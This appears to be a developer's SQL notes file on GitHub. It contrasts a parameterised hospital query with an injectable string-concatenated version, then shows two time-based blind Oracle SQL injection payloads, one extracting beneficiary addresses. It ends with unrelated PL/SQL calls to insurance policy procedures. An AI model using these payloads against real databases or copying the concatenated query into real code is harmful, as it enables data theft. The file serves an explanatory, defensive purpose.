python/sql.sql at master · fighteryu/python

History

200 lines (113 loc) · 4.82 KB

Raw

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

182

183

184

185

186

187

188

189

190

191

192

193

194

195

196

197

198

199

200

/*********************防SQL注入脚本************************************/

SELECT hi.hospital_name

FROM hospital_information hi

WHERE hi.is_valid = 'Y'

AND hi.IS_EXIST_OFFICIAL_WEBSITE = 'Y'

AND hi.last_invalid_date IS NULL

AND hi.branch_code

in (select relative_branch_code

from branch_code_relation

where branch_code = #branchCode#

and relative_grade <= 0);

/*****************注入脚本******************************************/

SELECT hi.hospital_name

FROM hospital_information hi

WHERE hi.branch_code LIKE '$branchCode$%'

AND hi.is_valid = 'Y'

AND hi.IS_EXIST_OFFICIAL_WEBSITE = 'Y'

AND hi.last_invalid_date IS NULL

由于branchCode参数被SQL注入后，语句会变成：

SELECT hi.hospital_name

FROM hospital_information hi

WHERE hi.branch_code LIKE '88952634'

AND 3823 = (SELECT COUNT (*)

FROM ALL_USERS T1,

ALL_USERS T2,

ALL_USERS T3,

ALL_USERS T4,

ALL_USERS T5)

AND 'Ahea' LIKE 'Ahea%'

AND hi.is_valid = 'Y'

AND hi.IS_EXIST_OFFICIAL_WEBSITE = 'Y'

AND hi.last_invalid_date IS NULL

/**********************2*****************************/

SELECT hi.hospital_name

FROM hospital_information hi

WHERE hi.branch_code LIKE '88952634'

AND 8808 = (CASE

WHEN (ASCII (

SUBSTRC (

(SELECT NVL (

CAST (

ENTRY_VALUE AS VARCHAR (4000)),

CHR (32))

FROM (SELECT ADDRESS AS ENTRY_VALUE,

ROWNUM AS LIMIT

FROM PUBDATA.BENEFICIARY_INFO)

WHERE LIMIT = 1),

1)) > 1)

THEN

(SELECT COUNT (*)

FROM ALL_USERS T1,

ALL_USERS T2,

ALL_USERS T3,

ALL_USERS T4,

ALL_USERS T5)

ELSE

8808

END)

AND 'bkhQ' LIKE 'bkhQ%'

AND hi.is_valid = 'Y'

AND hi.IS_EXIST_OFFICIAL_WEBSITE = 'Y'

AND hi.last_invalid_date IS NULL

--接口调用

declare

v_flag varchar2(1);

v_message varchar2(1000);

begin

l_pos_survival.proc_matu_idvl(p_policy_no => '0066202060007702',

p_prod_seq => 1,

p_proc_date => sysdate,

p_flag => v_flag,

p_message => v_message);

end;

declare

v_product_sur_amt number;

v_product_div_sur_amt number;

v_flag varchar2(10);

v_message varchar2(1000);

begin

l_pos_pub.calc_product_cash_value(p_policy_no => '000000033752524',

p_prod_seq => 1,

p_calc_date => sysdate,

p_base_cash_value => v_product_sur_amt,

p_div_cash_value => v_product_div_sur_amt,

p_flag => v_flag,

p_message => v_message);

dbms_output.put_line(v_product_sur_amt || ':' || v_product_div_sur_amt);

end;

declare

v_flag varchar2(1000);

v_message varchar2(1000);

begin

l_pos_survival.draw_survival_due_idvl('000000033757960',

date '2023-7-31',

date '2023-8-31',

v_flag,

v_message);

dbms_output.put_line(v_flag || ':' || v_message);

end;

declare

v_flag varchar2(1000);

v_message varchar2(1000);

begin

l_pos_survival.prepare_to_pay_single(p_policy_no => '000000033757960',

p_prod_seq => 1,

p_calc_start_date => date'2023-7-31' - 30,

p_calc_end_date => date'2023-8-31',

p_flag => v_flag,

p_message => v_message);

dbms_output.put_line(v_flag || ':' || v_message);

end;

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

FilesExpand file tree

sql.sql

Latest commit

History

sql.sql

File metadata and controls